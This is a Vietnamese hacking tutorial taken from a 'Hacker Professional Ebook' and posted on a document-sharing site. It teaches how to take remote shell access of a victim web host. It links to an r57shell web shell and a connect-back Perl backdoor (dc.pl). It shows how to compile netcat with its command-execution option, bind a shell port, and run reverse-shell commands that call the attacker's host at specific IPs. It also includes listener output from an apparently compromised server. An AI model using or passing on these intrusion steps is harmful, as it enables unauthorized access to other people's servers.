1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 207 docx

5 329 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Netcat For Win32 & *NIX, Putty
Thể loại Hướng dẫn
Năm xuất bản 2025
Định dạng
Số trang 5
Dung lượng 270,82 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect.

Trang 1

1) Netcat for Win32 & *NIX , PuTTy :

Trích:

http://ruthtr.com/uploads/Netcat.zip

Trích:

http://www.tartarus.org/~simon/putty /x86/putty.exe

2) Máy tính nối mạng riêng tại nhà hoặc 1 hosting hỗ trợ SSH (ở đây ĐĐ xài hosting)

3) Đã tham khảo qua bài viết này :

Trích:

http://www.quantrimang.com/view.asp? 1&news_id=7378

4) Một con r57shell hoặc script connect-back bất kì :

Trích:

http://k.1asphost.com/dondoc/dc.pl

Trích:

http://k.1asphost.com/dondoc/r57.php

5) Kiến thức Windows và *NIX

-

Start :

- Install netcat trên hosting :

- Mở file netcat.c chỉnh một số thứ sau :

+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu / : // res_init();

+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE

#define TELNET

- Up lên host

- Dùng PuTTy kết nối đến = SSH

Trang 2

- biên dịch: make linux

- chmod nc 755

- chạy thử: /nc -h

Nếu hiện ra như sau là được :

- Bind Port :

Cái này trong con r57shell đã hỗ trợ sẵn , cách làm tương đối đơn giản Kéo xuống cuối con r57 phần : Bind port to /bin/bash , trong đó :

- Port : bất kỳ port nào bạn thích , ví dụ : 2121

Trang 3

- Password for access : pass để quyền truy cập (để mặc định là r57)

- Use : để là Perl

Xong rồi bạn nhấn Bind , sau đó trên máy tính của mình bạn mở Netcat ra và kết

nối đến victim như sau :

Cú pháp :

Trích:

C:\netcat>nc -nvv [ip của victim] 2121

-nvv : dùng ip dạng số và hiển thị thông tin chi tiết về kết nối hiện tại

Ví dụ :

Trích:

C:\netcat>nc -nvv 66.246.215.103 2121

Nếu ok thì ta sẽ nhận được shell lệnh

Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect

- Back-connect :

Cách 1 :

Vào phần back-connect của con r57 :

- IP : địa chỉ IP của host install netcat ví dụ 216.120.237.150

- Port: bất kì ví dụ 3131

- Use : để mặc định Perl

Dùng PuTTy kết nối đến host = SSH , di chuyển đến thư mục chứa con netcat vừa biên dịch :

Chạy lệnh sau :

Trích:

bash-2.05a$ /nc -l -n -v -p 3131

Quay sang con r57 nhấn Connect , nếu ok thì trên cửa sổ PuTTy sẽ được như sau : Code:

listening on [any] 3131

connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 56973

Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux

Trang 4

uid=32466(ruth) gid=969(ruth) groups=969(ruth)

xong !

Cách 2 :

Upload file dc.pl ở trên lên host

Dùng con r57 run command như sau :

Cú pháp :

Trang 5

Trích:

perl dc.pl [ip] [port]

Ví dụ :

Trích:

perl dc.pl 216.120.237.150 4141

Cửa sổ PuTTy để netcat lắng nghe tại cổng 4141 , nếu ko có gì trở ngại thì ta sẽ được shell lệnh như sau :

Code:

listening on [any] 4141

connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 57421

== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE

==

==Systeminfo==

Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux

==Userinfo==

uid=32466(ruth) gid=969(ruth) groups=969(ruth)

==Directory==

/home/ruth/public_html/uploads/test

==Shell==

id

uid=32466(ruth) gid=969(ruth) groups=969(ruth)

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN